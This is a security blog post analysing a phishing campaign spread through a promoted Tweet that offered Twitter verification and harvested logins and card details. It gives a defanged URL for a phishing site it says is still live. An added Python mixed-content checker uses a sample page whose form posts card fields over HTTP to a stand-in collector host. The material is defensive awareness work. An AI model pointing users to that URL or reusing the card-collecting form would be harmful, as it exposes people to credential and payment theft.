There’s been a bit of an issue with promoted Tweets on Twitter in the last few days – well, one specific promoted Tweet at any rate – in the form of a rogue phish asking for login credentials and payment information.
What is a Promoted Tweet?
All well and good. However:
The promoted Tweet on display shows what appears to be a “Verified Accounts” feed, alongside the message
The link did indeed lead to a phish, and we decided to take a look around. First, the stats:
Over 3 days, the Tweet was clicked by 812 people, with 97.4% of those hitting the link via Twitter’s t.co redirect (in other words, directly from the sponsored Tweet). 644 visitors arrived via iPhone, with 534 hits coming from the US.
The phish itself (still live at time of writing) is located at
mobile-authentication(dot)000webhostapp(dot)com/welcome(dot)html
It focuses on the well-worn phish approach that is “Come and get yourself a nice blue tick on your profile”:
The second step of the phish asks for username, email address, company name, phone number and password, alongside some other bits and pieces such as whether or not the victim uses Twitter Ads and how many followers they have:
The final step in the phish asks for card number, expiry date, security code, name, billing address, and contact email:
One of the things people tend to look out for when avoiding phishing scams is checking whether the site is secure, on the basis that most phish pages are typically non-SSL. It’s always worth stressing that this aspect taken on its own, with no other potential phishy red flags considered, is NOT a magic bullet, as there are some phish scams out there which are indeed touting a padlock.
Sure enough, the phishing page actually is secure…
…for the first two pages, at least.
At the point where the site is asking for payment information, our browser flags the page as containing content which is not secure, which may help to steer at least a few victims away from disaster. Things aren’t going to plan for Twitter right now, and the last thing the service needs is a bunch of phishing links served up via sponsored Tweets.
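The “not secure” flag on the payment step is what browsers raise for mixed content: an HTTPS page that loads scripts or images from, or submits a form to, plain HTTP. The following is an added example (not code from the original post) of a small mixed-content checker run over a constructed page that resembles the card-details step; every hostname and file name in it is a placeholder, not the live phishing site.

```python
# Added example: flag insecure (http://) resources and form targets on an HTTPS page,
# the same condition that made the browser mark the phish's payment step as not secure.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# "Active" mixed content (scripts, frames, form submission) can alter or exfiltrate
# the page; "passive" (images, stylesheets) mostly just downgrades the padlock.
ACTIVE = {("script", "src"), ("iframe", "src"), ("form", "action"),
          ("object", "data"), ("embed", "src")}
PASSIVE = {("img", "src"), ("link", "href"), ("audio", "src"), ("video", "src")}


class MixedContentParser(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []  # (severity, tag, resolved_url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            key = (tag, name)
            if value and (key in ACTIVE or key in PASSIVE):
                target = urljoin(self.page_url, value.strip())  # resolves relative/protocol-relative
                if urlsplit(target).scheme == "http":
                    self.findings.append(("active" if key in ACTIVE else "passive", tag, target))


def find_mixed_content(page_url, html):
    """Return [(severity, tag, url), ...] for insecure resources; [] if the page is not HTTPS."""
    if urlsplit(page_url).scheme != "https":
        return []  # no padlock to undermine in the first place
    parser = MixedContentParser(page_url)
    parser.feed(html)
    return parser.findings


# Constructed sample (placeholder hosts): the page is HTTPS, but the card form posts
# over HTTP and a validation script is pulled over HTTP; the stylesheet is fine.
SAMPLE_PAGE_URL = "https://phish.example/payment.html"
SAMPLE_HTML = """<html><head><link rel="stylesheet" href="style.css">
<script src="http://cdn.example/validate.js"></script></head><body>
<img src="http://phish.example/verified.png">
<form action="http://collector.example/submit.php" method="post">
<input name="card"><input name="expiry"><input name="cvv"></form></body></html>"""


def check_sample():
    return find_mixed_content(SAMPLE_PAGE_URL, SAMPLE_HTML)


if __name__ == "__main__":
    for severity, tag, url in check_sample():
        print(f"[{severity}] <{tag}> uses {url}")
```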
Whether links you see on Twitter are served up by friends, strangers, or even sponsored content placed there via Twitter itself, never take them for granted – the moment you see a site asking for login credentials and/or payment information, think very carefully about your next move. “Trust, but verify” has never seemed quite so relevant…
Christopher Boyd (hat tip to Izzy Galvez)